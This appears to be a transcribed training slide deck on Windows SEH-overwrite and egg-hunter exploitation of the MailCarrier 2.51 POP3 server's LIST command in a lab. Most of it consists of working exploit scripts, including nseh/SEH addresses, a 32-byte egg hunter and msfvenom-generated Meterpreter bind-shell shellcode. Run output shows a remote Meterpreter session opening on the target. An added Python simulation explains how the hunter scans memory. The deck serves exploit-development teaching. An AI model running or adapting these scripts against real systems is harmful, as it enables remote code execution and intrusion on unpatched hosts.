:~/hacktobasics/SEH# msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 680 (iteration=0)
x86/alpha_mixed chosen with final size 680
Payload size: 680 bytes
Final size of c file: 2882 bytes
unsigned char buf[] =
"\x89\xe1\xd9\xf6\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
[... remainder of the 680-byte alpha_mixed payload, not legible in the screenshot ...]

Using msfvenom, we generate our bind shell once again, excluding the bad characters found earlier.

We add this to our final exploit (1/2).


GNU nano 3.2                     seh7-nops-shellcode.py

import sys
import socket
import time

nseh = "\xeb\x12\x90\x90"
seh = "\x0c\x11\x0d\x1b"
nops = "\x90" * 20
shellcode = (
# ... first part of the 680-byte msfvenom output, cut off at the top of the screenshot ...
"\x6f\x6e\x35\x4d\x53\x68\x78\x65\x50\x31\x6e\x46\x4d\x6e\x6b"
"\x56\x56\x33\x5a\x31\x50\x63\x58\x35\x50\x46\x70\x35\x50\x65"
"\x50\x33\x66\x62\x4a\x37\x70\x73\x58\x72\x78\x39\x34\x71\x43"
"\x6a\x45\x49\x6f\x68\x55\x6f\x63\x61\x43\x42\x4a\x35\x50\x71"
"\x46\x31\x43\x70\x57\x75\x38\x73\x32\x6a\x79\x39\x58\x43\x6f"
"\x59\x6f\x4a\x75\x6e\x63\x59\x68\x77\x70\x33\x4e\x45\x57\x37"
"\x71\x58\x43\x44\x69\x39\x56\x72\x55\x4a\x49\x5a\x63\x4d\x6b"
"\x48\x70\x6f\x45\x69\x32\x33\x66\x62\x4a\x33\x30\x72\x73\x59"
"\x6f\x6e\x35\x41\x41")

# the shellcode goes straight after the nop sled; the padding shrinks by its length
buffer = "A" * 6174 + nseh + seh + nops + shellcode + "D" * (10000-6174-4-4-20-(len(shellcode)))

print "[+] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.0.150", 110))
print s.recv(1024)
print "[*] Sending USERNAME\r\n"
s.send('USER test' + '\r\n')
print s.recv(1024)
print "[*] Sending PASSWORD\r\n"
s.send('PASS test' + '\r\n')
print s.recv(1024)
print "[*] Sending Evil LIST buffer\r\n"
s.send('LIST ' + buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')


SEH exploitation 


:~/hacktobasics/SEH# python seh7-nops-shellcode.py
MailCarrier 2.51 POP3 Buffer Overflow in LIST command

Sending pwnage buffer: with 10000 bytes...
<2764.1556619970@>, TABS Lab POP3 server ready.

Sending USERNAME
test is known here.

Sending PASSWORD

Welcome! 0 messages (0 bytes)

Sending Evil LIST buffer

(Immunity Debugger: execution reaches our shellcode. On the target, netstat run from the C:\Documents and Settings\test> prompt shows 0.0.0.0:443 LISTENING, i.e. the bind shell is waiting for us.)


SEH exploitation 


msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     443              yes       The listen port
   RHOST     192.168.0.150    no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(multi/handler) > run

[*] Started bind TCP handler against 192.168.0.150:443
[*] Sending stage (179779 bytes) to 192.168.0.150
[*] Meterpreter session 1 opened (192.168.0.240:36585 -> 192.168.0.150:443) at 2019-04-30 12:27:28 +0200


Egg hunters 


Playing with limited buffer space can be fun!

An egg hunter is a small piece of shellcode that searches memory for a specific pattern, the "egg": a 4-byte tag repeated twice. Once it finds the egg, it jumps to the full shellcode placed right after it, in a larger area of available buffer space (sometimes a different stored variable or buffer from the one that triggers the overflow). This is useful when the space you control at the point of the crash is too small for the real payload but a copy of your input survives somewhere else in memory.

We will expand upon the SEH exploit from the previous example, using an egg hunter to find our shellcode.

Additional information: https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
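How the 32-byte hunter walks memory is easier to see in a model than in the debugger. The following is an added example (Python 3, not part of the deck): it holds the msf-egghunter bytes the deck generates, shows that the tag WOOT is the immediate of the hunter's mov eax (which is why the hunter searches for the tag twice, WOOTWOOT, and never matches its own code), and simulates the scan over a constructed sparse address space with the same control flow as the real code: skip a whole page when the access probe fails, otherwise compare two DWORDs and jump just past them. The page-readability probe, the fake addresses 0x00A00500 and 0x00B00000 and the stand-in shellcode are constructed for the example; the buffer layout (egg at offset 2980, nseh at 6174, 10000 bytes total) is the one the deck's final script uses. The real hunter does its probe with the NtAccessCheckAndAuditAlarm system call via int 0x2e.

```python
import struct

PAGE_SIZE = 0x1000
TAG = b"WOOT"                       # msf-egghunter -e WOOT
EGG = TAG * 2                       # what actually goes in the buffer: WOOTWOOT

# The 32-byte hunter exactly as msf-egghunter printed it in the deck
EGGHUNTER = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
             b"\x74\xef\xb8\x57\x4f\x4f\x54\x89\xd7\xaf\x75\xea\xaf\x75\xe7"
             b"\xff\xe7")


def hunter_tag(hunter):
    """The tag is the imm32 of 'mov eax, imm32' (opcode B8) at offset 17 of the hunter."""
    if hunter[17] != 0xB8:
        raise ValueError("not the 32-byte NtAccessCheckAndAuditAlarm hunter")
    return hunter[18:22]


class FakeMemory:
    """Constructed stand-in for a process address space: a sparse set of 4 KiB pages."""

    def __init__(self):
        self.pages = {}

    def write(self, addr, data):
        for i, b in enumerate(data):
            a = addr + i
            self.pages.setdefault(a // PAGE_SIZE, bytearray(PAGE_SIZE))[a % PAGE_SIZE] = b

    def is_readable(self, addr):
        # Stand-in for the int 2e probe: the real hunter treats STATUS_ACCESS_VIOLATION
        # (low byte 0x05 in AL) as "this page is unmapped, skip it".
        return (addr // PAGE_SIZE) in self.pages

    def read_dword(self, addr):
        out = bytearray()
        for a in range(addr, addr + 4):
            if not self.is_readable(a):
                return None
            out.append(self.pages[a // PAGE_SIZE][a % PAGE_SIZE])
        return bytes(out)


def egghunt(mem, start=0, limit=0x7fff0000, egg=EGG):
    """Walk memory the way the hunter does; return the address it would 'jmp edi' to."""
    edx = start | 0xFFF                      # or dx, 0x0fff: last byte of the current page
    while edx < limit:
        edx += 1                             # inc edx
        if not mem.is_readable(edx):         # push edx / push 2 / pop eax / int 2e / cmp al,5
            edx |= 0xFFF                     # je back to 'or dx,0x0fff': skip the whole page
            continue
        if mem.read_dword(edx) != egg[:4]:   # mov eax,"WOOT" / mov edi,edx / scasd
            continue                         # jne -> inc edx
        if mem.read_dword(edx + 4) != egg[4:]:   # second scasd
            continue
        return edx + 8                       # jmp edi: edi now points just past the egg
    return None


def build_final_buffer(shellcode, hunter=EGGHUNTER):
    """Layout of the deck's egghunter4-shellcode.py: egg + nops + shellcode go before the SEH
    record; the hunter sits right after the 20-byte sled that nseh jumps into."""
    head = b"A" * 2980 + EGG + b"\x90" * 20 + shellcode + b"A" * 2486
    if len(head) != 6174:                    # nseh must stay at offset 6174
        raise ValueError("egg/shellcode changed the nseh offset to %d" % len(head))
    tail = b"\xeb\x12\x90\x90" + struct.pack("<I", 0x1B0D110C) + b"\x90" * 20 + hunter
    return head + tail + b"D" * (10000 - len(head) - len(tail))


def demo():
    shellcode = b"\xcc" * 680                # constructed stand-in for the 680-byte payload
    buf = build_final_buffer(shellcode)
    mem = FakeMemory()
    decoy, base = 0x00A00500, 0x00B00000    # constructed addresses
    mem.write(decoy, EGGHUNTER)              # a stray copy of the hunter: contains WOOT once
    mem.write(base, buf)                     # the LIST argument as the server stored it
    found = egghunt(mem)
    return {
        "found": found,
        "expected": base + 2980 + len(EGG),  # first byte after WOOTWOOT
        "lands_on": mem.read_dword(found),   # the nops that precede the shellcode
        "decoy_skipped": found > decoy + len(EGGHUNTER),
        "buffer_len": len(buf),
    }


if __name__ == "__main__":
    r = demo()
    print("egg found at 0x%08x, bytes there: %s" % (r["found"], r["lands_on"].hex()))
```

The single WOOT inside the decoy copy of the hunter is passed over because the second scasd fails, which is the reason the egg is the tag doubled. Note also that the scan starts from whatever edx holds when the hunter runs and only moves forward, so in a real exploit the egg has to live at an address above that starting point.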


GNU nano 3.2                     egghunter1.py

import sys
import socket
import time

nseh = "\xeb\x12\x90\x90"
seh = "\x0c\x11\x0d\x1b"
nops = "\x90" * 20

buffer = "A" * 6174 + nseh + seh + nops + "D" * (10000-6174-4-4-20)

print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.0.150", 110))
print s.recv(1024)
print "[*] Sending USERNAME\r\n"
s.send('USER test' + '\r\n')
print s.recv(1024)
print "[*] Sending PASSWORD\r\n"
s.send('PASS test' + '\r\n')
print s.recv(1024)
print "[*] Sending Evil LIST buffer\r\n"
s.send('LIST ' + buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"

We start with our skeleton Python script, which uses nseh, seh and nops (no shellcode this time).


Egg hunters


:~/hacktobasics/egghunter# msf-egghunter -b "\x00" -e WOOT -f c
unsigned char buf[] =
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
"\x74\xef\xb8\x57\x4f\x4f\x54\x89\xd7\xaf\x75\xea\xaf\x75\xe7"
"\xff\xe7";
:~/hacktobasics/egghunter#

Using msf-egghunter to generate our 32-byte egg hunter, with \x00 as the only bad char and a tag of WOOT.


GNU nano 3.2                     egghunter3-WOOTWOOT-egg.py

import sys
import socket
import time

nseh = "\xeb\x12\x90\x90"
seh = "\x0c\x11\x0d\x1b"
nops = "\x90" * 20
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a"
"\x74\xef\xb8\x57\x4f\x4f\x54\x89\xd7\xaf\x75\xea\xaf\x75\xe7"
"\xff\xe7")
eggy = "WOOTWOOT"
# 3000 + 8 (eggy) + 3166 = 6174, so nseh stays at the same offset as before;
# the screenshot reads 3174, which would push the SEH record 8 bytes too far.
buffer = "A" * 3000 + eggy + "A" * 3166 + nseh + seh + nops + egghunter + "D" * (10000-6174-4-4-20-32)

print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.0.150", 110))
print s.recv(1024)
print "[*] Sending USERNAME\r\n"
s.send('USER test' + '\r\n')
print s.recv(1024)
print "[*] Sending PASSWORD\r\n"
s.send('PASS test' + '\r\n')
print s.recv(1024)
print "[*] Sending Evil LIST buffer\r\n"
s.send('LIST ' + buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()

Adding the egg hunter to our code (it takes the shellcode's place after the nop sled), and placing the WOOTWOOT tag just after the initial "A" buffer.


Egg hunters 


:~/hacktobasics/egghunter# python egghunter2-WOOT-egg.py
MailCarrier 2.51 POP3 Buffer Overflow in LIST command

Sending pwnage buffer: with 10000 bytes...
<1752.1556623357@>, TABS Lab POP3 server ready.

Sending USERNAME
test is known here.

Sending PASSWORD

Welcome! 0 messages (0 bytes)

Sending Evil LIST buffer


Egg hunters 


(Immunity Debugger memory map view: Address | Size | Owner | Section | Contains | Type | Access | Initial | Mapped as.)


Egg hunters 


:~/hacktobasics/egghunter# msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 680 (iteration=0)
x86/alpha_mixed chosen with final size 680
Payload size: 680 bytes
Final size of c file: 2882 bytes
unsigned char buf[] =
"\x89\xe5\xda\xc2\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
[... remainder of the 680-byte alpha_mixed payload, not legible in the screenshot ...]

Once again, we generate our shellcode using msfvenom, with the same bad characters excluded.


(Screenshot of the first half of egghunter4-shellcode.py: the msfvenom output pasted in as the shellcode variable, alongside nseh, seh, nops, egghunter and eggy.)

Adding the shellcode to our exploit (1/2).


Egg hunters

GNU nano 3.2                     egghunter4-shellcode.py

# nseh, seh, nops, egghunter, eggy and the msfvenom shellcode are defined
# in the first half of the script, shown on the previous slide
buffer = "A" * 2980 + eggy + "\x90" * 20 + shellcode + "A" * 2486 + nseh + seh + nops + egghunter + "D" * (10000-6174-4-4-20-32)
print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.0.150", 110))
print s.recv(1024)
print "[*] Sending USERNAME\r\n"
s.send('USER test' + '\r\n')
print s.recv(1024)
print "[*] Sending PASSWORD\r\n"
s.send('PASS test' + '\r\n')
print s.recv(1024)
print "[*] Sending Evil LIST buffer\r\n"
s.send('LIST ' + buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"

Adding the shellcode to our exploit (2/2). The egg, 20 nops and the 680-byte shellcode now sit before the SEH record (2980 + 8 + 20 + 680 + 2486 = 6174, so nseh is still at offset 6174), and the egg hunter keeps the place after the nop sled where the shellcode used to be.


Egg hunters 


:~/hacktobasics/egghunter# python egghunter4-shellcode.py
MailCarrier 2.51 POP3 Buffer Overflow in LIST command

Sending pwnage buffer: with 10000 bytes...
<2784.1556625231@>, TABS Lab POP3 server ready.

Sending USERNAME
test is known here.

Sending PASSWORD

Welcome! 0 messages (0 bytes)

Sending Evil LIST buffer

Running our final exploit with the egg hunter and shellcode.


Egg hunters 


(Immunity Debugger disassembly of the egg hunter at the moment it runs: INT 2E, CMP AL,5, POP EDX and the conditional jump back are visible.)

To confirm, we find our tag in memory, followed by our nops and shellcode.

(Immunity Debugger disassembly and register views while the hunter runs: PUSH/POP sequence and the ESI, EDI and EIP registers visible.)

C:\Documents and Settings\test>netstat -an | find "443"

C:\Documents and Settings\test>netstat -an | find "443"
  TCP    0.0.0.0:443    0.0.0.0:0    LISTENING

C:\Documents and Settings\test>_

On the target, port 443 is now listening: the shellcode found by the egg hunter has started the bind shell.


msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     443              yes       The listen port
   RHOST     192.168.0.150    no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(multi/handler) > run

[*] Started bind TCP handler against 192.168.0.150:443
[*] Sending stage (179779 bytes) to 192.168.0.150
[*] Meterpreter session 1 opened (192.168.0.240:36491 -> 192.168.0.150:443) at 2019-04-30 13:57:04 +0200

meterpreter >

Connecting to our bind shell!


Q and A 


@telspacesystems 
www.telspace.co.za 